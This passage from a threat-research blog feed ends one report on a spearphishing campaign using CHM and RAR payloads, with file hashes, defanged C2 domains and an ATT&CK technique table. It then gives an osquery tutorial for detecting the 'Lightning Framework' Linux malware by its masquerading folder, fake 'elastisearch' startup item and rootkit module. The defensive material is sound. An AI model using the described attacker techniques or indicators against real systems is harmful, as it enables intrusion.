those claiming to be from other diplomatic entities. Always verify that the
sender is trusted and understand that even if it claims to be from a particular
person, it might not be. None of the social engineering techniques used are
novel and it is imperative that employees of companies should have a good
standard of security awareness about phishing emails, so employees can report
phishing emails for investigation.&lt;/p&gt;
&lt;p&gt;Always take care when handling attachments, and never open CHM files as they
are antiquated and not commonly used for legitimate purposes currently.&lt;/p&gt;
&lt;h2&gt;Indicators of Compromise&lt;span class="hx:absolute hx:-mt-20" id="indicators-of-compromise"&gt;&lt;/span&gt;
&lt;a href="#indicators-of-compromise" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;File Hashes (SHA256)&lt;span class="hx:absolute hx:-mt-20" id="file-hashes-sha256"&gt;&lt;/span&gt;
&lt;a href="#file-hashes-sha256" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1 (Email)
eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e (Email)
cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179 (Email)
8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74 (Email)
33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799 (Email)
5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc (Email)
ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1 (Email)
b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa (RAR)
33a20950e7f4b2191706ddf9089f1e91be1e5384cca00a57cf6b58056f70c96b (RAR)
7e7e90b076ef3ea4ef8ed4ef14fb599a2acb15d9ce00c78e5949186da1e355cf (RAR)
07504fcef717e6b74ed381e94eab5a9140171572b5572cda87b275e3873c8a88 (XLS)
06b4c1f46845cee123b2200324a3ebb7fdbea8e2c6ef4135e3f943bd546a2431 (CHM)
ded0635c5ef9c3d63543abc36a69b1176875dba84ca005999986bd655da3a446 (CHM)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Network&lt;span class="hx:absolute hx:-mt-20" id="network"&gt;&lt;/span&gt;
&lt;a href="#network" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;qwavemediaservice[.]net
mirzadihatti[.]com
coauthcn[.]com&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Mitre ATT&amp;amp;CK&lt;span class="hx:absolute hx:-mt-20" id="mitre-attck"&gt;&lt;/span&gt;
&lt;a href="#mitre-attck" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;ID&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Reconnaissance&lt;/td&gt;
&lt;td&gt;Email Addresses&lt;/td&gt;
&lt;td&gt;T1589.002&lt;/td&gt;
&lt;td&gt;The actor gathers target email addresses to target with spearphishing emails&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Initial Access&lt;/td&gt;
&lt;td&gt;Spearphishing Attachment&lt;/td&gt;
&lt;td&gt;T1566.001&lt;/td&gt;
&lt;td&gt;Spearphishing is used to deliver RAR attachments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;PowerShell&lt;/td&gt;
&lt;td&gt;T1059.001&lt;/td&gt;
&lt;td&gt;Encoded PowerShell is used by CHM payload&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;Exploitation for Client Execution&lt;/td&gt;
&lt;td&gt;T1203&lt;/td&gt;
&lt;td&gt;Microsoft Office exploits are used to execute code&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence&lt;/td&gt;
&lt;td&gt;Scheduled Task&lt;/td&gt;
&lt;td&gt;T1053.005&lt;/td&gt;
&lt;td&gt;Scheduled Tasks used for both execution and persistence&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Msiexec&lt;/td&gt;
&lt;td&gt;T1218.007&lt;/td&gt;
&lt;td&gt;Msiexec is used to launch next stage payloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Compiled HTML File&lt;/td&gt;
&lt;td&gt;T1218.001&lt;/td&gt;
&lt;td&gt;CHM files are used to deliver payloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Masquerading&lt;/td&gt;
&lt;td&gt;T1036&lt;/td&gt;
&lt;td&gt;Files are masqueraded as legitimate files and scheduled tasks are named after common tasks (eg. Adobe Updater)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;System Information Discovery&lt;/td&gt;
&lt;td&gt;T1082&lt;/td&gt;
&lt;td&gt;First stage payloads fetch Computer and User names&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;Web Protocols&lt;/td&gt;
&lt;td&gt;T1071.001&lt;/td&gt;
&lt;td&gt;HTTPS is used for C2 communication&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;Exfiltration Over C2 Channel&lt;/td&gt;
&lt;td&gt;T1041&lt;/td&gt;
&lt;td&gt;Data can be exfiltrated&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;</description></item><item><title>Detection Rules for Lightning Framework (and How to Make Them With Osquery)</title><link>https://research.intezer.com/blog/2022/08/lightning-framework-linux-detection-rules-osquery/</link><pubDate>Wed, 03 Aug 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/08/lightning-framework-linux-detection-rules-osquery/</guid><description>
&lt;p&gt;On 21 July, 2022, we released a blog post about a new malware called
&lt;a href="../../../2022/07/lightning-framework-new-linux-threat"&gt;Lightning Framework&lt;/a&gt;.
Lightning is a modular malware framework targeting Linux. At the time of the
publication, the Core module had one suspicious detection and the Downloader
module was not detected by any scanning engines on VirusTotal. Due to this, we
have again decided to release a followup blog posting showing how the
information we released can be used to investigate whether you have been
affected.&lt;/p&gt;
&lt;p&gt;There are many tools available to gather system information and to perform
threat hunting within an organization. One of our favorites is
&lt;a href="https://osquery.io"target="_blank" rel="noopener"&gt;osquery&lt;/a&gt;. We demonstrated in a previous blog how detection
rules created with osquery can be used to discover the multi-platform malware
&lt;a href="../../../2022/01/new-backdoor-sysjoker"&gt;Sysjoker&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This tutorial will show how we use gathered information from the reverse
engineering process to utilize in detection techniques that can serve as an
indication of compromise for the Lighting Framework. There are pros and cons to
this approach over just using file hashes. It allows us to potentially find
other samples related to the Lightning Framework that have a different file
hash but it can also turn up matches that are not malware. For example the
malleable C2 profile is encoded on disk and will have a unique hash each time,
therefore it is important to use other means of detection that are not hash
based.&lt;/p&gt;
&lt;h2&gt;Information Gathering with Osquery&lt;span class="hx:absolute hx:-mt-20" id="information-gathering-with-osquery"&gt;&lt;/span&gt;
&lt;a href="#information-gathering-with-osquery" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Osquery runs as an agent on machines and is designed to provide endpoint
visibility in a performant way. The data is collected by the agent and exposed
via SQL queries.&lt;/p&gt;
&lt;p&gt;There are two ways of running osquery, as a daemon via osqueryd or
interactively via osqueryi. The daemon takes a configuration file where the
queries are defined and executes them at a given interval. Data is continuously
collected by the daemon and the difference since the last execution is logged
to a result log. The interactive binary allows for ad-hoc queries and we will
use it in this tutorial to construct queries that can be added to the daemon&amp;rsquo;s
configuration. The queries will be added to a
&lt;a href="https://osquery.readthedocs.io/en/stable/deployment/configuration/#query-packs"target="_blank" rel="noopener"&gt;query-pack&lt;/a&gt;
to make it easier to manage.&lt;/p&gt;
&lt;h2&gt;Detecting File Artifacts from Lightning Framework&lt;span class="hx:absolute hx:-mt-20" id="detecting-file-artifacts-from-lightning-framework"&gt;&lt;/span&gt;
&lt;a href="#detecting-file-artifacts-from-lightning-framework" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Many files are created in a working directory in the Lightning Framework. We
can use these to write threat hunting or detection queries.&lt;/p&gt;
&lt;p&gt;If we look at the report, we can see that most of the files are created under a
folder named &lt;code&gt;/usr/lib64/seahorses/&lt;/code&gt;. This is a folder trying to masquerade as
the legitimate password and key manager
&lt;a href="https://gitlab.gnome.org/GNOME/seahorse"target="_blank" rel="noopener"&gt;Seahorse&lt;/a&gt;. We can use the osquery
table file to monitor for Lightning Framework files under this folder.
According to the &lt;a href="https://osquery.io/schema/5.1.0/#file"target="_blank" rel="noopener"&gt;schema&lt;/a&gt; for this
table, we can get which user created it, when the file was created, modified,
and last accessed. To enrich the data, we join the uid with the
&lt;a href="https://osquery.io/schema/5.1.0/#users"target="_blank" rel="noopener"&gt;users&lt;/a&gt; table and the gid with the
&lt;a href="https://osquery.io/schema/5.1.0/#groups"target="_blank" rel="noopener"&gt;groups&lt;/a&gt; table. This allows us to get
the username and the group name instead of just the ID numbers.&lt;/p&gt;
&lt;p&gt;Another thing that is useful is the file hash for the Lightning files. This can
be obtained by joining with the &lt;a href="https://osquery.io/schema/5.1.0/#hash"target="_blank" rel="noopener"&gt;hash&lt;/a&gt;
table on the path. This allow us to construct a query like this:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;groupname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;mtime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ctime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;atime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;md5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sha1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;sha256&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;users&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;JOIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;groups&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;gid&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;directory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/usr/lib64/seahorses/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;An example of a query that shows the malware artifacts is shown below:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/08/lightning-framework-linux-detection-rules-osquery/images/fig1.png" title="Successfully finding Lightning Framework files using osquery." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Successfully finding Lightning Framework files using osquery.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Detecting Persistence of Lightning Framework&lt;span class="hx:absolute hx:-mt-20" id="detecting-persistence-of-lightning-framework"&gt;&lt;/span&gt;
&lt;a href="#detecting-persistence-of-lightning-framework" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;If we look at the persistence documented in the report, we can see that the
framework maintains persistence by creating a startup script for the Downloader
module. We can find this by querying the
&lt;a href="https://osquery.io/schema/5.1.0/#startup_items"target="_blank" rel="noopener"&gt;startup_items table&lt;/a&gt; and
looking for the misspelled term &lt;code&gt;elastisearch&lt;/code&gt; (As opposed to the correct
application it is trying to mimic
&amp;ldquo;&lt;a href="https://www.elastic.co/elasticsearch/"target="_blank" rel="noopener"&gt;Elasticsearch&lt;/a&gt;&amp;rdquo;).&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;startup_items&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;elastisearch&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Detecting RootKits Installed by Lightning Framework&lt;span class="hx:absolute hx:-mt-20" id="detecting-rootkits-installed-by-lightning-framework"&gt;&lt;/span&gt;
&lt;a href="#detecting-rootkits-installed-by-lightning-framework" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Lightning Framework is able to install a Linux kernel module (LKM) rootkit. The
rootkit is used to hide process IDs and ports related to running processes of
the framework. Similarly to the startup item. The kernel module also has the
same misspelled &lt;code&gt;elastisearch&lt;/code&gt; name. To check whether it is installed on your
machine, run the following:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;kernel_modules&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;elastisearch&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;Next Steps for Your Lightning Detection Rules&lt;span class="hx:absolute hx:-mt-20" id="next-steps-for-your-lightning-detection-rules"&gt;&lt;/span&gt;
&lt;a href="#next-steps-for-your-lightning-detection-rules" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;After this we can tell the osquery daemon to load the query pack. This can be
done by adding a pack entry to the daemon&amp;rsquo;s configuration file:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt;&amp;#34;packs&amp;#34;&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;lightning_framework&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;/path/to/pack/lightning.json&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;To get alerting for this, it is best to forward the logs to your SIEM and
create alerts there. We&amp;rsquo;re curious to see more samples of Lightning Framework –
let us know if you uncover more samples or are able to take the research on it
further!&lt;/p&gt;
&lt;h2&gt;Appendix A – lightning.json Pack&lt;span class="hx:absolute hx:-mt-20" id="appendix-a--lightningjson-pack"&gt;&lt;/span&gt;
&lt;a href="#appendix-a--lightningjson-pack" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;queries&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;linux-artifacts&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nt"&gt;&amp;#34;query&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;SELECT path, filename, username, groupname, mtime, ctime, atime, md5, sha1, sha256 FROM file
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN users using (uid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN hash using (path)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; JOIN groups using (gid)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="s2"&gt; WHERE file.directory in (&amp;#39;/usr/lib64/seahorses/&amp;#39;);&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
